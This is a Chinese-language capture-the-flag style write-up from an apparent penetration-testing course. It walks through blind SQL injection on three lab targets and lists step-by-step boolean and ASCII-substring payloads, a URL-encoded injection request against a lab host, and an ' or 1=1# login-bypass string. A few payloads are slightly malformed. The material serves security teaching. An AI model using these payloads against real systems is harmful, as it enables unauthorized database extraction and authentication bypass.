封神台——训练营0基础学渗透测试

盲注-没有回显情况下SQL

• SQL盲注——靶场A
• SQL盲注——靶场B
• SQL盲注——靶场C

SQL盲注——靶场A

1.判断数据库长度：and length(database())>4 12
2 .数据库名称：and substr(database(),1,1)='k ’ ascii(substr(database() ),1,1))>107
用burp进行爆破：开服务器，用本机的私网，注意变量的添加 107 97 110 119 111 108 111 110 103 120 105 97 kanwolongxia
3.判断有几个表名和表名长度：

and length(( select table_name from information_schema.tables where table_schema='kanwolongxia' limit 0, 1)) >1 长度为6
and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 1,1))>1 长度为4
and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 2,1))>1 长度为3

4.判断表名：

and ascii(substr((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 2,1),1,1)) = 1

108 111 102 108 97 103 --loflag
110 101 119 115 --news
117 115 101 114 --user
5.判断字段长度：

and length((select column_name from information_schema.columns where table_name='loflag' limit 0,1))=2
and length((select column_name from information_schema.columns where table_name='loflag' limit 1,1))=6

6.查询字段名：

and ascii(substr((select column_name from information_schema.columns where table_name='loflag' limit 0,1),1,1))>1 字段为id
and ascii(substr((select column_name from information_schema.columns where table_name='loflag' limit 1,1),1,1))>1 字段为flaglo

7.查具体数据长度：

and length((select flaglo from loflag limit 0,1))=8
and length((select flaglo from loflag limit 1,1))=7
and length((select flaglo from loflag limit 2,1))=10
and length((select flaglo from loflag limit 3,1))=12
and length((select flaglo from loflag limit 4,1))=14

8.查具体数据：

 and ascii(substr((select flaglo from loflag limit 0,1),1,1))>1 --zKaQ-QQQ
 and ascii(substr((select flaglo from loflag limit 1,1),1,1))>1 --zKaQ-RD
 and ascii(substr((select flaglo from loflag limit 2,1),1,1))>1 --zKaQ-Moren
 and ascii(substr((select flaglo from loflag limit 3,1),1,1))>1 --zKaQ-time-hj
 and ascii(substr((select flaglo from loflag limit 4,1),1,1))>1 --zKaQ-time-zxxz

SQL盲注——靶场B

1.判断是否注入注入：select *from news where id=“1” and 1=2 #"
2. 判断字段数长度：select *from news where id=“1” and length(database())=12 #"
3. 判断字段数：select *from news where id=“1” and ascii(substr(database) (),1,1))=107#"第一个字母为k
107 97 110 119 111 108 111 110 103 120 105 97 kanwolongxia
4.查表名得到loflag：

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1%22and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20%20table_schema=%27kanwolongxia%27%20limit%200,1),1,1))=108%23

5.查字段名flaglo：

"and ascii(substr((select column_name from information_schema.columns where table_name='loflag' limit 1,1),1,1))=102%23 

6.查询具体数据：

"and ascii(substr((select flaglo from loflag limit 1,1),1,1))>1%23

flag为zKaQ-RD

SQL盲注——靶场C

用万能密码登入：’ or 1=1#
同前面步骤一样，只是换了一个传参